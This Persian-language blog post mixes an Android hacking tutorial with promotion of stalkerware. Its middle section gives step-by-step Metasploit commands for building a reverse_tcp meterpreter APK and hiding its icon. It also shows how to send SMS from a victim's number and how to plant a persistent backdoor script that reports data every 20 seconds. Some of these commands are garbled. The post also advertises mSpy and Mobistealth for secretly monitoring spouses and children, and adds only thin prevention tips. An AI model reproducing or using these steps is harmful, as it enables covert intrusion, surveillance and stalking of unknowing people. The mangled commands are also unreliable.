هک اندروید با استفاده از کالی لینوکس و راه های امنیت رد یابی افراد

چگونگی کنترل، نظارت و ردیابی افراد از طریق شماره ی تلفن همراه  با پیشرفت علم و تکنولوژی نرم افزار های بسیار زیادی در خصوص ردیابی ، کنترل و نظارت افراد از طریق شماره ی تلفن همراه برنامه نویسی و طراحی شده است. در این مقاله قصد داریم در مورد این نرم افزارها و نحوه ی عملکرد آنها توضیح دهیم. هک اندروید ...


هک تضمینی اینستاگرام به راحتی آب خوردن و جلوگیری از هک


چگونگی رد یابی افراد هک اندروید

هک اندروید با استفاده از کالی لینوکس و راه های امنیت رد یابی افراد


بسیار شنیده ایم که بسیاری از شما به دنبال نرم افزاری مبنی بر کنترل ، نظارت و ردیابی فعالیت همسران و یا فرزندان خود می گردید. در این مطلب می خواهیم شما را با یک نرم افزار خاص و منحصر به فرد در این زمینه معرفی و آشنا کنیم. نرم افزار رد یاب موبایل یکی ار قدرتمند ترین و کاربردی ترین نرم افزار های موجود در سطح جهانی بوده که کار نظارت، کنترل و رد یابی تلفن همراه را با استفاده از شماره موبایل انجام می دهد. تاکنون ثابت شده است که این نرم افزار در بین ده نرم افزار برتر دنیا قرار گرفته است و جایگاه ویژه و خاصی را در این خصوص از آن خود کرده است. 


از این نرم در شرایط های مکانی و زمانی متفاوتی استفاده می شود. از آنجا که نحوه ی عملکرد این نرم افزار به گونه ای ست که به کار نظارت، کنترل و ردیابی تلفن همراه می پردازد، از این رو این ویژگی منحصر به فرد استفاده از این نرم افزار مشمول به شرایط خاصی کرده است. به طور مثال زمانی که گوشی شما گم شده و یا دزدیده می شود به راحتی می توانید با استفاده از این نرم افزار تمامی فعالیت های موجود در تلفن همراه خود را از راه کنترل کرده و مانع از دسترسی دیگر افراد به اطلاعات محرمانه و شخصی در گوشی موبایل خود شوید. این نرم افزار به گونه ای طراحی شده است که تمامی پیام های نوشتاری و تصویری را در فضای مجازی و غیر مجازی زیر نظر دارد و کلیه فعالیت ها اعم از ارسال پیام ها، لیست مکالمات و تماس ها، لیست مخاطبین، تمامی عکس ها، فیلم ها و عکس ها و حتی به برنامه های نصب شده در گوشی موبایل نظارت و کنترل کامل دارد. 


علاوه بر این بسیار شنیده ایم که والدین در خصوص فعالیت های فرزندان خود در فضای مجازی و غیر مجازی و به طور کل در گوشی موبایل نگران و حساس بوده و به دنبال نرم افزاری مبنی بر کنترل و نظارت آنها و بالا بردن سطح امنیت فرزندان در گوشی موبایل می گردند. استفاده از این نرم افزار و نصب آن تا مقدار زیادی از نگرانی و دغدغه ی امروزی این والدین می کاهد و به آنها کمک می کند تا تا با کنترل فرزندان خود بتوانند آنها را در این خصوص هدایت و راهنمایی نمایند. 


چگونگی هک سیستم عامل اندرویدی با استفاده از برنامه ی کالی لینوکس 


در این مطلب قصد داریم شما خوانندگان عزیز و محترم را با نحوه ی چگونگی هک سیستم های اندرویدی با استفاده از برنامه ی کالی لینوکس و نحوه مقابله و جلوگیری در برابر آن آشنا نماییم.


سیستم عامل اندرویدی که امروزه مورد استفاده بسیاری از کاربران قرارگرفته ، طرفداران زیادی داشته و بسیار محبوب بوده است، یکی از سیستم عامل های معروف در سطح دنیا می باشد که به طور کل طراحی آن متناسب با گوشی موبایل بوده ولی بر روی هر سیستم دیگری قابل اجرا و نصب می باشد. از این رو طرفداران بسیاری نیز پیدا کرده و بسیاری از کاربران را به سمت خود جذب کرده است. در این مطلب به چگونگی هک این سیستم عامل با استفاده از کالی لینوکس و روش های مقابله با آن می پردازیم.


متاسپلویت 


متاسپلویت ها درواقع frame work های بسیار پیچیده و قدرتمند تست هک و نفوذ هستند و به صورت پیش فرض در کالی لینوکس حضو دارند و از محبوبیت بسیار بالایی نیز بر خوردارند و در ادامه راجع به این موضوع بیشتر توضیح خواهیم داد. 


آموس تست هک سیستم عامل های اندرویدی با استفاده از متاسپلویت ها


مراحا زیر را دونه به دونه و با دقت اجرا و دنبال نمایید:


یک: ابتدا با دستور  msfconsole وارد متاسپلویت شوید. 


دوم: سپس دستور use android/ meterpreter/ reverse_tcp  را برای ساخت apk وارد نمایید. 


سه: حال برای تنظیم پیلود دستور زیر را با دقت دنبال کنید فقط در این قسمت توجه داشته باشید که باید آی پی سرور خود را وارد نمایید. 


این مراحل را اجرا نمایید:


ابتدا دستور set LHOST 127.0.0.1 را وارد نمایید و یک پورت مخصوص را برای انجام این کار انتخاب نموده و سپس دستور  set LPORT 6060 را وارد نمایید. 

در این مرحله دستور generate-f raw –o PentestCore.apk را به منظور ساخت فایل اصلی هک اندروید اجرا کنید.

سپس دستور use multi/handler را برای ایجاد کانکشن بین پیلود ها اجرا نمایید. 

و سپس آدرس پیلود ساخته شده را به این گونه set PAYLOAD android/meterpreter/reverse_tcp وارد نمایید و اجرا کنید.


و سپس تمامی مراحل ذکر شده را بدون ایجاد کوچکترین تغییر و با دقت برای ست تنظیمات آی پی و پورت انجام دهید. 


در مرحله ی پایانی برای نصب اپلیکیشن اندروید کافی ست دستور exploit را وارد نموده و صبر کنید. بعد از انجام این مرحله امکان دستیابی به meterpreter به شما داده خواهد شد. در صورتی که دستگاه اندرویدی شما روت شده باشد این به این معنا ست که شما به حجم بالایی از اطلاعات و داده های مهم و حیاتی دست یافته اید. 


چگونگی کار کردن و استفاده از meterpreter


معمولا سه دستور برای استفاده از meterpreter قابل اجرا است که در ادامه در مورد آن توضیح خواهیم داد. پس با ما همراه باشید.


البته قبل از توضیح در مورد این سه دستور باید گفت که می توانید برای انجام هر کار از دستور help استفاده نمایید.


دستور اول: hide_app_icon


با این دستور شما می تانید برای مدت طولانی تری فایل مخرب خود را از نظرها مخفی کرده و مانع از حذف و یا دیلیت شدن آن شوید. با این روش تست نفوذ خوذ را بدون ایجاد کوچکترین مشکلی انجام خواهید داد. 


دستور دوم: check_root


با استفاده از این دستور همانطور که از اسم آن پیداست می توانید از روت بودن و یا روت نبودن سیستم عامل اندرویدی خود آگاهی پیدا کنید. 


دستور سوم: send_sms-d number –t “ body text sms”


با استفاده از این دستور می توانید با شماره ی شخصی که سیستم او را هک کرده اید پیامکی به شماره ی خود ارسال نمایید. فقط نکته ای که در این خصوص باید به آن توجه نمایید این است که ابتدا باید در بخش number شماره شخص مورد نظر را وراد نمایید، سپس، در بخش مخصوص به  text هر انچه را که مایل هستید تایپ کنید و بعد از آن بر روی گزینه ی enter کلیک کرده تا پیامک موردنظر با شماره شخص دیگری به موبایل شما ارسال شود. 


ساخت بک دور 


اگر سیستم عامل اندرویدی شما روت شده باشد، شما می توانید با استفاده از بک دور دسترسی خود را به داد ها و اطلاعات به صورت همیشگی اجرا نمایید. 


برای انجام این کار ابتدا دستور /cd را وارد نمایید سپس با وارد کردن دستور cd/sdcard به scsrd وارد شوید. در این مرحله فایل بک دور را دانلود نمایید. در مرحله ی بعد با وارد کردن دستور upload/root/Desktop/backdoor.sh/sdcard اندروید شخص مورد نظر را آپلود نمایید. بعد از این مرحله با وارد کردن دستور shel بخش خود را به بخش اندرویدی منتقل کنید. 


بعد از انجام کلیه ی این مراحل دو دستور /cd و cd/sdcard را برای آپلود اسکریپت وارد نمایید. 


در مرحله ی بعد که مرحله ی بسیار مهمی هم هست باید برای ساخت و اجرای بک دور با استفاده از دستور اسکریپت برای هک اندروید دستور sh lifetime.sh را وارد نماییید. در نهایت با واردکردن دستور reboot سیستم عامل اندروید شخص مورد نظر را کاملا بوت کرده و دسترسی شما به اطلاعات و داده ها همیشگی می شود. با این حالت، در واقع هر 20 ثانیه یک بار تمامی اطلاعات مهم برای شما ارسال شده و شما به راحتی می توانید به سیستم شخص مود نظر وصل شوید.


چگونگی جلوگیری از هک سیستم عامل های اندرویدی


تاکنون هرآنچه را لازم بود در مورد هک سیستم عامل های اندرویدی را بدانید، به شما خوانندگان عزیز آموزش دادیم در ادامه می خواهیم به روش های جلوگیری و ممانعت از هک سیستم عامل های اندرویدی بپردازیم. 


برای جلوگیری از هک سیتم عامل خود از آنتی ویروس های معتبر استفاده نمایید. 

از نصب برنامه هایی که از سایت های نامعتبر دانلود شده اند، خودداری نمایید. 

با استفاده از کالی لینوکس که در ابتدای این مقاله در موردآن توضیح دادیم، تست نفوذ را بر روی دستگاه خود اجرا نمایید. 

از وارد شدن به وب سایت های نامعتبر و نامطمئن خودداری نمایید. 

هر برنامه ی جدید که نصب می کنید با استفاده از آنتی ویروس اسکن کنید.

سعی کنید اطلاعات اصلی و حیاتی را در گوشی موبایل خود ذخیره نکنید. 

برای ورود به حسا ب کاربری خود پسورد پیچیده ای انتخاب نمایید. 

هک اندروید

برنامه ی ردیاب تلفن همراه هک اندروید


برنامه ی mspy همان برنامه ی ردیاب تلفن همراه از طریق شماره ی گوشی می باشد که قبلا در مورد آن صحبت کردیم. این برنامه سازگار با هر دو نوع سیستم عامل اندروید و iOSمی باشد و بر روی هر دو گوشی قابل اجرا و نصب است. طراحی این برنامه به قدری به روز و پیشرفه است که می توان از راه دور به کلیه فعالیت های شخص مورد نظر بدون اینکه نشانه ای بر جای گذاشته شود و او متوجه و آگاه به فعالیت های شما باشد، کنترل، نظارت و رد یابی نمود. 


نصب این برنامه بسیار راحت، سریع و آسان است و هر کاربر معمولی می تواند از این برنامه استفاده کند. از ویژگی های منحصر به فرد و خاص این برنامه عبارت اند از: 


نظارت و کنترل تمامی پیامک های تصویری و نوشتاری با مشاهده ی تاریخ و زمان دقیق و مشخص

چک و بازبینی لیست تمامی تماس ها، مخاطبین و مکالمات همراه با زمان و ساعت مشخص

کنترل و رد یابی لحظه  به لحظه ای موقعیت جغرافیایی ( مکانی و زمانی) شخص مود نظر 

کنترل و نظارت به تمامی برنامه های نصب شده بر روی گوشی موبایل 

نظارت و چک کردن تمامی عکس ها، فیلم ها و کلیه ی کلیپ های آرشیو شده 

و غیره. هک اندروید


قیمت این نرم افزار در حال حاضر 99.16 دلار می باشد.


معرفی نرم افزار بین المللی Mobistealth نظارت و ردیابی


نرم افزار Mobistealth نیز یکی دیگر از نرم افزار های کنترلی می باشد که در جهت نظارت، کنترل و رد یابی اطلاعات شخصی در گوشی موبایل از راه دور، برنامه نویسی و طراحی شده است. از ویژگی های این نرم افزار می توان به :


کنترل و نظارت تمامی پیامکا های ارسال شده و دریافت شده 

نظارت بر تمامی مرور گرهای استفاده شده در گوشی موبایل

چک و بازیابی تمامی تماس ها و مکالمات با تاریخ دقیق 

نطارت، کنترل و رد یابی تمامی ایمیل ها

ردیابی موقعیت زمانی و مکانی شخص مورد نظر هک اندروید

نظارت و ردیابی


با استفاد از این برنامه به راحتی می توانید GPS شخص مورد نظر را به صورت آنلاین از راه دور به صورت لحظه ای رد یابی و کنترل نمایید. 


این نرم افزار نیز مانند نرم افزار mspy که در ابتدای این مقاله به آن اشاره شد و در مورد آن توضیح داده شد، در جهت کنترل و نظارت بر کلیه ی فعالیت های شخص مورد نظر در تلفن همراه برنامه نویسی و طراحی شده ست. با استفاده از این نرم افزار ها بسیاری از والدین نگران می توانند فعالیت های فرزندان خود را در فضای مجازی و غیر مجازی و در شبک های پیام رسان اعم از اینستاگرام، تلگرام، واتس اپ، ایمو، تانگو، توییتر، فیس بوک و غیره کنترل کنند و با راهنمایی آنها سطح امنیت فرزندان خود را در این فضاها بالا ببرند. هم چنین این نرم افزار در زمانه هایی که گوشی شما به سرقت رفته باشد و یا گم شده باشد و به دست کس دیگری افتاده باشد مانع از نفوذ و دسترسی انها به اطلاعات شخصی و محرمانه ی شما در گوشی موبایل می شود. قیمت نرم افزار Mobistealth در حال حاضر 79 دلار می باشد. 


کلام آخر


در این مقاله تمامی تلاش خود را به کار گرفته ایم تا شما را با نرم افزار های کنترلی mspy و Mobistealth و ویژگی های آنها آشنا کنیم. امیدوارم از مطالعه ی این مقاله لذت برده باشید.


آن چه که باید در مورد امنیت اینستاگرام بدانید